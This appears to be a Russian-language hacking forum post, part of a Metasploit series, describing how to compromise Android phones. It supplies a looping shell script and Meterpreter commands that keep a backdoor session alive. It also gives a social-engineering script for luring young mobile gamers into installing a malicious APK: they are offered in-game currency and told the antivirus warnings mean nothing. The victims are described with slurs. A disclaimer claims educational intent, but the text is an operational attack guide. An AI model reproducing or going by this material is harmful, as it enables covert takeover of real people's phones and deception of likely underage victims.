Серьезный Metasploit часть 2

Прошу обратить внимание! Автор данной статьи не несёт ответственности за любые последствия вслед использования предоставленной информации. Все материалы опубликованы исключительно в образовательных целях!

В прошлой части я рассказывал вам как создать бэкдор, сегодня расскажу о методе взлома, удержания сессии и скрытие файла от системного антивируса!

Начнем с удержания сессии

Создадим файл shell.sh и перемещаем его mv shell.sh /storage/emulated/0/downloads

#!/bin/bash
while :
do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
sleep 20
done

В сессии Meterpeter напишем

shell
cd /sdcard/emulated/0/
upload /storage/emulated/0/downloads/shell.sh
sh shell.sh

ожидаем 1-2 минуты...

Все! Сессия будет прилетать даже при слабом интернет соединении

Метод взлома

Обычно я рассчитываю на дурачков которые играют в brawl или в другую очередную парашу поэтому ищем чаты с немного даунами, лучше юзать приложения для этого так как там сидят подобные особи

Заливаем ваш apk на файлообменник и ищем жертву, заливаем ему что вы написали приложение и за его тест дадите ему 50-150р на донат в его любимой игре

А пачиму мне написалb что приложение опасно и вообще 20 предупреждений что скачевать нильзя???

Скажите ему, что просто приложение официально не зарегистривано и поэтому антивирусы ругаются (работает в 99% случаях)

молодцы мы получили сессию!